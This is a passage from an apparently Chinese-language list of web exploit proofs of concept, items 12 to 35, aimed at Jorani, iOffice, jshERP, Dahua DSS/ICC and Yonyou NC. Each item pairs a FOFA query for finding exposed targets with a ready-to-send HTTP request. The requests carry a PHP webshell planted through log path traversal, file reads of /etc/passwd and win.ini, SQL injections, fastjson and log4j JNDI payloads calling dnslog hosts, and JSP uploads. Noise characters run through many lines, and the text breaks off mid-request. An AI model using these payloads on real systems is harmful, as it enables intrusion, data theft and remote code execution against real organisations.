) a6 n. w% V) j9 T; D c3 a; mCache-Control: no-cache* x4 C- I; C( q4 y
Upgrade-Insecure-Requests: 1" h. Q$ w3 f+ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ | K4 p* c: w5 Z5 A1 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ z. z9 ]2 \1 _% `5 J4 H
Accept-Encoding: gzip, deflate# b% p$ `( }: d! g" T( D
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
1 W4 _: |- b! y* n( RConnection: close
6 O# F7 w- X7 M( `
6 n% q. J, ?, Z; d+ ?& [ _5 ?* r
12. Jorani < 1.0.2 远程命令执行
8 X# U3 I2 H; W1 {1 h* vFOFA:title="Jorani", T& j/ B' d9 k( `! h* B
第一步先拿到cookie1 K4 X$ z: n! R/ y
GET /session/login HTTP/1.1) X0 N' A+ Y: S, n
Host: 192.168.190.308 B; A7 s( ^+ f5 p( l4 ]# I& g
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36- o3 z U$ p8 Z" |0 N! V, H
Connection: close8 P! R4 P; X5 j( }, k: q
Accept-Encoding: gzip
$ q/ F3 p! _( n. q% k. v& ~( x7 h7 y7 V/ }
q' h$ G4 c9 P% [: v8 p3 [+ v- t
响应中csrf_cookie_jorani用于后续请求+ A/ W& s" \. u) }3 c: X4 i7 v/ }
HTTP/1.1 200 OK
3 N: v9 r$ `6 ?$ _Connection: close# ~* j' J1 |6 U' _8 b6 g& j5 @! r/ U
Cache-Control: no-store, no-cache, must-revalidate
, @, F: Z+ l3 }! ]! I' XContent-Type: text/html; charset=UTF-8/ } Y6 ]) u# a
Date: Tue, 24 Oct 2023 09:34:28 GMT
1 U5 L& n4 R8 VExpires: Thu, 19 Nov 1981 08:52:00 GMT( m9 r7 o- t% j; g" c1 u
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT0 e; _+ f' _/ i, ^" @3 c* V6 A: `0 h
Pragma: no-cache
! A$ J) J$ y5 l" \5 z8 O5 j/ `Server: Apache/2.4.54 (Debian)+ b5 |# {( E2 O1 R
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/% K7 I1 m- \$ z' f" i% F) b. T6 C
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly* b- t6 }2 R7 k9 o, [
Vary: Accept-Encoding
+ R$ G! Q' L1 B9 P) ?; ^ J" ^' k$ d6 C5 u3 I
1 l! |4 s3 ^: y4 VPOST请求,执行函数并进行base64编码1 V) w9 ]$ ?6 y1 w7 m
POST /session/login HTTP/1.1( Y% j: `# g% R. b) o5 }4 U. K
Host: 192.168.190.30
- N. `6 ^' c" }$ M& `; A/ ^' eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36+ m: i( n) b4 \' A" Y6 E
Connection: close3 L/ I$ r) O5 t& G' [
Content-Length: 252# C8 T$ C2 j+ `
Content-Type: application/x-www-form-urlencoded
7 I0 Z3 l h! F( {Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
2 L( K- Q2 C3 `, k3 f6 G0 S* `Accept-Encoding: gzip Y0 t8 B8 u9 c5 B8 ?( O
5 ~$ U9 D+ S) j2 `1 a2 {9 j
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor& Y4 V9 l! j) p! [+ c" W
2 H$ f1 L3 k5 w0 F$ g* f0 o
0 c2 B0 B) C( `& J7 x `7 h
8 D$ C$ r! P' @. {
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串6 I- l- _' I! F$ M+ R
GET /pages/view/log-2023-10-24 HTTP/1.15 ]3 s5 s, u5 C
Host: 192.168.190.308 A* E$ c, b7 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36' g9 u- ]. F- k8 D& ?0 C; P
Connection: close
+ I4 y1 N' g$ D( ] V a" p3 _8 N' jCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
6 Z$ G# V) ?- z) z* i3 d% LK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=6 ^- @: d2 h! L0 Z) c/ m
X-REQUESTED-WITH: XMLHttpRequest* y' ]; C' C$ g$ d0 N O
Accept-Encoding: gzip
' S$ x1 E6 s F- j3 i# \7 ^, @. G( k. t6 b0 z3 k( @. v( `
+ y( l4 h0 i P. o
13. 红帆iOffice ioFileDown任意文件读取
8 Z& j/ ?1 j' z) f+ hFOFA:app="红帆-ioffice"
9 u8 u% @* h$ o7 @5 sGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
" Y1 |+ \9 s. WHost: x.x.x.x
R+ B5 e8 R' p" Q& _User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ ?: _0 F7 J- `0 U1 n
Connection: close6 B& J- d- K4 U4 u! v5 Q, Z7 I2 B
Accept: */*
! |) O1 v# H D& X7 s; xAccept-Encoding: gzip
! W+ c3 t. h {( ]6 F2 \ x
1 {1 h% u, e4 o" S' A! b' `
* U/ I. D( ]/ w- j: o5 B2 g$ l14. 华夏ERP(jshERP)敏感信息泄露& r) N; K9 I7 b F. h4 K( W' E! H6 p1 B
FOFA:body="jshERP-boot"' V% P1 m% k' i2 n
泄露内容包括用户名密码
3 z5 a1 a( O' u+ |# h( H, L/ rGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
# B+ _$ W( T9 N9 z" D* m; CHost: x.x.x.x
* s; Q7 y) L( B; b5 \5 k: p5 a8 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.365 L, m* l" z$ H( S( m; S' D
Connection: close. \% V) h3 A, e3 m
Accept: */*% h- g! G2 q9 ?/ A4 H
Accept-Language: en
7 W1 p/ d" P9 s5 c7 lAccept-Encoding: gzip
6 [; n4 U& O. i1 F9 i* {1 @
, @1 J2 k; \8 x3 f: G7 Z1 F' w
! l8 j6 q) n2 p0 I6 O15. 华夏ERP getAllList信息泄露8 h: L: \/ [9 |
CVE-2024-0490
' R8 i( Q9 j5 cFOFA:body="jshERP-boot"4 a0 H3 B$ V! Y! [1 h
泄露内容包括用户名密码
/ E3 g* f/ ^$ K" p0 G H! SGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
9 i0 ^8 T8 l0 U9 @. l |! p- EHost: 192.168.40.130:1002 E# p& C, \6 H# ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
2 N" d& g5 O8 }0 K) uConnection: close
5 t0 o" P1 d9 w1 c, DAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8! ^: o2 M7 c; D3 K
Accept-Language: en
: [, G# W- b2 E0 l+ _sec-ch-ua-platform: Windows
3 ~1 p! y: n/ LAccept-Encoding: gzip
) S" ?+ e3 G1 w8 r6 |) Y
% g# g% R. Z2 `9 k1 b9 W. u! d1 A. H: K# c
16. 红帆HFOffice医微云SQL注入
) `& Y4 W: a2 H- t* j! C2 c9 aFOFA:title="HFOffice"+ H; N9 N' ] F3 J2 z) D
poc中调用函数计算1234的md5值2 r* K! h4 @9 n) C# O9 a9 j- o
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
4 u y* E, j$ ^. O, iHost: x.x.x.x
# l6 q1 J& W( c. l; P- D) T& LUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
3 E- |/ i5 _+ ?' B0 E1 DConnection: close" _: y2 P$ F1 |! E
Accept: */*
G+ J$ f7 [+ X. I4 ^$ zAccept-Language: en# N! o# ]) ~# Y2 U7 w( U% U% b
Accept-Encoding: gzip
& T3 m3 b0 l6 C: G( R! U- }2 Q+ z3 z& q+ R
1 C5 Q; z+ q# S: G$ m
17. 大华 DSS itcBulletin SQL 注入. L( L( P. F/ | B. k
FOFA:app="dahua-DSS"
0 Y. t" b7 N3 Z$ {) x) y6 EPOST /portal/services/itcBulletin?wsdl HTTP/1.1# f' ]5 Q: H( Z2 ]
Host: x.x.x.x) H; H& r# k+ ^6 S; ]$ g0 j! h0 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 Y; Y1 c) w! c( b/ N3 \' [Connection: close
- n" `" W- u: `( r2 q: jContent-Length: 345- W; `! _: F7 I! k& D5 f7 ?2 j
Accept-Encoding: gzip
+ D! f) _7 _5 E9 X0 L0 s' g
. W; v9 O; }, C) U/ x<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
. s5 o2 G. i- p<s11:Body>' Z* g/ t# S; I* _7 h0 n# p$ d9 h3 {
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
3 B* L4 d) |! t* `" h2 @ <netMarkings>
7 |' V) g! E4 @ (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1& B7 p5 a" N" X0 f2 Y8 x$ F6 z. F8 j) W
</netMarkings>
' c. n1 A- a( J </ns1:deleteBulletin>
+ @ {1 m4 e8 a3 k) r* W8 q' Q </s11:Body># d$ a1 f ]. |' d2 O
</s11:Envelope>
0 H8 X, w% w7 i p- V# g | H8 ^. \/ }# N/ [/ r+ q
- k: R( l; ~/ H" H
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
# G8 V3 J% F/ YFOFA:app="dahua-DSS"3 M, P2 w/ Y L+ g. b. k) k% R# Q
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
x- T2 i( h% y8 Z" v$ T/ }Host: your-ip6 G8 ^5 a7 z1 A7 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. r2 Y/ X) d/ U* e" Z" p' rAccept-Encoding: gzip, deflate
! N Z0 d `+ s/ |# R8 `( @# CAccept: */*' S: ^0 d: g% b8 M8 K6 f* ?
Connection: keep-alive' X/ j) e3 |/ A5 _7 h& \/ }4 R
# Q( u5 J# y' W; X
3 F+ D" p# d5 {9 T K0 \, o: A4 e& x0 F& k9 b9 g: V9 \ M
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入3 t* k' i* }* p/ L4 `$ V5 f+ @% u
FOFA:app="dahua-DSS"1 K) E1 |0 J$ z8 K. M/ Q |1 I! t
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
# F) n; E/ N0 G$ mHost:3 [ b* Q1 w; f x( Z* [$ E, I
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
. C5 g6 h' h% NAccept-Encoding: gzip, deflate
; K; z4 R' T4 r0 E7 x% FAccept: */*
1 i3 T) t& K9 PConnection: keep-alive
9 p/ o/ l; {9 }! ?5 {6 I; s, {4 S e3 O* I, Q0 W4 f% }. Z
# K! L4 M" g9 q4 c1 c2 ~20. 大华ICC智能物联综合管理平台任意文件读取
' m2 C" {0 @7 o- q8 \FOFA:body="*客户端会小于800*"9 R/ ^# s6 ?2 q: Z- b- q
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
3 s: d) E) y+ {7 E- Q" H. QHost: x.x.x.x- a+ d# y9 _7 h0 t, ?: ]5 o( Q5 p' I
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& i; W. O7 p$ E$ }/ q; p
Connection: close
$ }( O8 X0 Q5 X' m$ pAccept: */*
E) H0 W/ N9 z! r: \Accept-Language: en
! q6 i- T6 e6 I; O5 T3 y$ y5 r2 SAccept-Encoding: gzip& c* V& U/ I2 h4 h% L4 M' ?
7 \1 |* k" m2 z0 b
+ B8 n5 {, q, ^& L! ^1 g21. 大华ICC智能物联综合管理平台random远程代码执行
7 @$ E6 {0 ?2 `7 R8 aFOFA:icon_hash="-1935899595"8 M. M/ ] A4 u, ?& T
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1% D/ V/ V: T8 W9 ]: a5 n9 E5 D6 D6 J
Host: x.x.x.x3 h V: F' b/ K# X7 C; {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! T2 r: U6 k! v$ b' f6 i q4 M
Content-Length: 161
, s0 k, p2 z: a; _9 zAccept-Encoding: gzip
7 m* U: Q4 g5 }6 cConnection: close
; `6 P8 g1 }! j, g7 L/ w3 L* TContent-Type: application/json;charset=utf-8
+ v- w8 e8 g1 {7 @; {7 m/ N, E" g P' i0 |
{
& K; f/ h; _8 }1 S! \- B"a":{, }' |; G7 e3 N
"@type":"com.alibaba.fastjson.JSONObject",
: a: X; L+ C+ ]( T$ A5 d+ p3 V {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
3 S- P/ \, R) H1 ], T6 a: I3 I }""
5 `* P2 V( M& u2 g' M* u) \}/ a [% @ v1 I; h, c) S) g
9 R8 q. u# x/ |- A+ @% Y
% ]; N$ T! H7 @$ t8 N22. 大华ICC智能物联综合管理平台 log4j远程代码执行
5 R j* O2 j. U! E) }* q- A7 KFOFA:icon_hash="-1935899595"
9 K6 U n5 n' ?$ Z2 G* UPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1, u" i* Z3 q }, X5 F/ }" b2 K
Host: your-ip
" U" q$ y' n" v/ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 N5 I4 t) f1 |' Q! ]- G( S
Content-Type: application/json;charset=utf-8
! s7 f9 M; w5 t- _) C1 F% @, Q7 i* V' s' T
{
. d# o/ s/ x u9 u"loginName":"${jndi:ldap://dnslog}"
/ i8 V E& q. f6 d}+ y+ |! E5 j# W2 `9 `, A
6 o6 R/ Z# ^ H; l% Q
/ f9 g( Y/ I2 F& f
i+ k( q' T! ?1 A23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
7 ^* {1 X( x% c5 ^8 y1 X S% _FOFA:icon_hash="-1935899595"9 p# C" X# ~4 `- n7 P1 E3 k4 t
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
# b7 M# L7 i# H- F& @Host: your-ip
) B6 W0 F% u/ D6 ^4 F2 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% x$ L; J' t5 _1 u& |
Content-Type: application/json;charset=utf-8
% S% W4 f( ]5 B6 W6 H! `Accept-Encoding: gzip3 K" n, L* G* w5 u. n
Connection: close
1 G Z0 M" O) R! L
0 L# N, B- l' K0 [4 z& x: H{% k0 e0 W, X+ g1 X o% j
"a":{
7 Y4 H3 X% j, `* ?+ ]) M* n "@type":"com.alibaba.fastjson.JSONObject",6 p( H9 M5 [; q( [( [
{"@type":"java.net.URL","val":"http://DNSLOG"}
6 s8 u2 |+ e6 {2 w; [* E }"", B1 {# C' O7 ~) g i3 S: z0 w u
}% ^& X& K$ L* U I
/ B; Q M5 f# a `6 z# Q% N* C- w4 d. B; c! C
24. 用友NC 6.5 accept.jsp任意文件上传4 z1 ]0 H6 P+ D/ x5 k) s& Z+ F1 \
FOFA:icon_hash="1085941792"! v( G$ E3 l# a8 w5 }+ z
POST /aim/equipmap/accept.jsp HTTP/1.1" _$ ?5 y+ e# h: j
Host: x.x.x.x) s% @9 w, ^2 O
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
5 r' d) L& j) E T" R" x( q) qConnection: close4 C$ h2 |! y9 ?' Z D: D! S4 `+ E
Content-Length: 449
4 h6 @3 T* i% B9 @3 Y& C0 u7 BAccept: */*. F+ @8 b5 I5 v0 B* t" {+ l# Z+ t
Accept-Encoding: gzip) l. _ B1 |/ |4 A
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc$ ]8 h7 G- K0 X" N2 z' K# y
1 p7 R; X4 P: Q h) Z# E-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! i0 Q& ^$ ]1 Y% Z4 e r9 m
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"4 A5 _3 _' \+ v; Y2 L. ^7 O
Content-Type: text/plain
8 K& l1 n* F5 g! n% L, r% }& a, y' q
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
% y, [* p3 A! x4 o-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc# g2 K3 y# z( J( ?$ }
Content-Disposition: form-data; name="fname") B9 j7 ^0 R8 H6 ?3 r! Z2 R* a5 Y
9 K! G! L A6 B) M" R\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
& I4 E$ k3 a5 K, B i-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
- G! p8 Y b( W9 j7 q8 ?
$ u( o8 m- r% d6 X. I& `2 F( o! H0 X( U5 L: j0 I0 y: S
25. 用友NC registerServlet JNDI 远程代码执行9 L/ Z1 P: ~+ \9 W7 M3 Q( b/ c
FOFA:app="用友-UFIDA-NC"
4 H* j' U, E9 c1 ~1 x* mPOST /portal/registerServlet HTTP/1.1
8 e* Q" r6 p. WHost: your-ip, l$ k/ }2 D' D! b9 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
% Q4 x9 _4 a/ B# [0 f2 x. r! s, h cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
b0 {& M0 j. F& bAccept-Encoding: gzip, deflate
+ [: Y6 ?) B/ x3 W# BAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6+ k+ Y; d& D5 z* C% ?
Content-Type: application/x-www-form-urlencoded
3 \& t! w" X9 x7 k- x% B. y j- W& g: x" n) E# M! g% D
type=1&dsname=ldap://dnslog
v' h3 m" i/ x
% d; X2 J5 w/ G: a$ H. [% `8 X7 c6 z x
3 p+ Q# w( L1 z, i4 P26. 用友NC linkVoucher SQL注入
$ H O; ^, G, r0 T8 ^: M+ eFOFA:app="用友-UFIDA-NC"
& ?8 P L1 X4 o% U/ I, ?GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
7 t% Y: W% q2 ]% y$ UHost: your-ip
) N1 h, ?; P- Y( Q+ h& b* V# ^6 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( X. ~ O' l+ k' ? g7 e1 E" _
Content-Type: application/x-www-form-urlencoded# j( R8 y+ z2 ^' ?" Y
Accept-Encoding: gzip, deflate
- G, D. t' ?. G. b4 M% RAccept: */*
5 x. W$ c5 ?4 zConnection: keep-alive
6 I& e' B9 h4 F R. t5 T
8 ^ p% T! Z6 _, G% ?5 w* u7 M% {: Z: [& f
27. 用友 NC showcontent SQL注入2 [& I$ i, ?/ e* [* `; E
FOFA:icon_hash="1085941792": L0 h* K8 `. c4 T
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.18 w3 e$ _5 {& o9 O
Host: your-ip. h- Y% x8 S- T* R7 l/ W8 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Y ~$ @2 F! [Accept-Encoding: identity
2 h3 x. B8 c" p6 R# }Connection: close$ s4 A7 {7 p! @4 } n, G/ X
Content-Type: text/xml; charset=utf-8
8 v: G6 Q$ O: D) n) ^4 a. T
- M1 [# d% \# Y9 r k, {
2 }( A" W: E, |28. 用友NC grouptemplet 任意文件上传
; }, ?5 h3 n% A; P% f2 KFOFA:icon_hash="1085941792"6 N% M! ?4 j8 P
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1) E% l& W6 f+ s4 e
Host: x.x.x.x5 v5 t2 ?& l1 }; o3 e* ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" ?, b/ i4 f7 s2 j+ e3 K$ l
Connection: close
# c, U1 G; o' F% p4 Q3 SContent-Length: 268
- z: c/ x2 f/ b+ H2 `' X ]( |Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk& S5 H9 u. G/ l
Accept-Encoding: gzip2 I; O# Q* k+ L3 X# S9 r
8 W& ~6 r0 C. O+ M- a' L& H
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk; }+ I9 N8 P7 Y1 C: J$ }, ]- {6 P
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"5 E7 h, M& @9 M* O4 T
Content-Type: application/octet-stream% r& M" t$ H& w' ~
% I. _# a; x: u. m
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>9 ?9 `% P! _" G4 K3 d
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
2 J* I% v6 L) A6 }
& E) `; h4 ?0 ]; V1 @4 d7 b7 H( ?# A1 D3 Y
/uapim/static/pages/nc/head.jsp
6 F' `2 u+ d4 {: Z0 Z
% }, r8 m7 N) m: r% B8 R9 R29. 用友NC down/bill SQL注入: i9 v, k1 o+ x+ T* [
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"' o4 L4 p5 y) ^0 O( r, R
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1 B4 d F$ G# n, V$ v e/ ]% l& Q$ }5 t
Host: your-ip! G& p. f8 V1 C8 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% y1 M! C& }" e* x! N0 I4 V" w
Content-Type: application/x-www-form-urlencoded+ j- B2 u5 A8 l8 w! U n
Accept-Encoding: gzip, deflate8 Q; R; O' s( K9 x* N, ^6 n. A
Accept: */*
3 k3 P4 @6 O- \Connection: keep-alive
$ U2 K' R8 V+ g% i" F) C, v$ @' O; J4 I) d- A5 a$ G; q
6 M( T: \7 U! r8 T( Q0 n% p
30. 用友NC importPml SQL注入
$ N) j f: S8 ~* ~FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"! i u, x/ Y0 X2 ]" T8 c6 j
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1& h% Y+ p8 b3 T( Y
Host: your-ip
: a- b( u) ? T" D/ n* zContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V/ D |3 r% S1 N R. z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36* {% W P/ e+ E- g
Connection: close
; D( P1 V/ Z7 m& n- D
% |4 [& g- j: a5 A0 X- _------WebKitFormBoundaryH970hbttBhoCyj9V" l9 @+ A. Z2 R; ?( f4 u* Q
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
/ Y4 D8 Q. N, @0 U7 jContent-Type: image/jpeg
: c$ M0 D/ I( H: R: X. B------WebKitFormBoundaryH970hbttBhoCyj9V--& {- q2 [, q- s/ A4 `
; B: z# W7 j, E) f4 {
% h6 V# Z1 l( z. J: a; y; u
31. 用友NC runStateServlet SQL注入
0 {: {7 U% N* v; R8 pversion<=6.5; [/ t) ?4 }4 A v2 [$ h+ K
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
) y1 u' o1 n9 Y, I" uGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.10 Q4 ]" P3 k4 e1 X2 X! Y
Host: host
& `1 e1 c' S1 p0 B( lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
6 ~. S3 ]6 s' \4 v6 T/ s( c! fContent-Type: application/x-www-form-urlencoded( t I& p+ z; G3 e% n/ M/ ]& t
8 k1 o* p1 i1 U$ _6 B8 \" I
' C* q* t6 |9 p1 G+ d: \& C7 r; R32. 用友NC complainbilldetail SQL注入
. y" M5 H9 ^3 b s |. ~version= NC633、NC65
W" U0 @' Z( r( L7 K4 g+ `; ~+ [FOFA:app="用友-UFIDA-NC"
; P/ w5 X' g5 `) IGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1! f8 j/ L1 r+ d1 u+ Z+ B4 @
Host: your-ip I! o+ S9 c: N% }/ U* _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 }& w. C J- y. TContent-Type: application/x-www-form-urlencoded. V& N! n& c; v
Accept-Encoding: gzip, deflate
' @) t( v$ s% ~/ T9 l1 IAccept: */*' z! z. x+ N* j5 S
Connection: keep-alive$ ^/ p& H+ t" h2 P$ R
1 t6 \$ M( p4 h
* D' c3 u' t3 w, v4 B) v# T/ [( y) z33. 用友NC downTax/download SQL注入
3 p6 \6 L3 R9 n' Y) z1 J5 S$ `1 Dversion:NC6.5FOFA:app="用友-UFIDA-NC". ^% u3 F2 W7 k' `, ]9 A
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 A2 v6 D3 x/ g# ?$ q% NHost: your-ip) T7 L L# b& w t6 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 q' q# j. I/ X
Content-Type: application/x-www-form-urlencoded
# J4 V8 ]5 ?- b9 CAccept-Encoding: gzip, deflate/ Q0 h& B3 ~6 W- M7 E
Accept: */*
% v) F, M: }0 b: ?& V6 J# cConnection: keep-alive
8 H4 E; h+ n) e0 T8 Z+ U; B: x( n' T9 D7 S2 J/ o
0 U9 s& v, e3 W2 P9 Q# R
34. 用友NC warningDetailInfo接口SQL注入( S& A# B, S5 }0 C" _
FOFA:app="用友-UFIDA-NC"
- ^2 G6 o* A% MGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1: q q1 V$ S0 u2 P0 B
Host: your-ip3 b: m1 l' \7 G5 a2 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% E# R- M. m5 CContent-Type: application/x-www-form-urlencoded
4 M- f( `8 r D) v( Q$ F0 XAccept-Encoding: gzip, deflate1 k- C$ d' A7 |/ `
Accept: */*. K0 H" k1 F; A- M! U6 Q9 }
Connection: keep-alive
5 E+ z7 t4 ~7 \3 J, t/ q. d: {$ T5 n% z+ g: a
^3 L) e! e( Y2 l n1 Y7 Y
35. 用友NC-Cloud importhttpscer任意文件上传6 Q1 b% @0 G7 f% e& b
FOFA:app="用友-NC-Cloud"
; J# z+ g3 ?1 H9 zPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
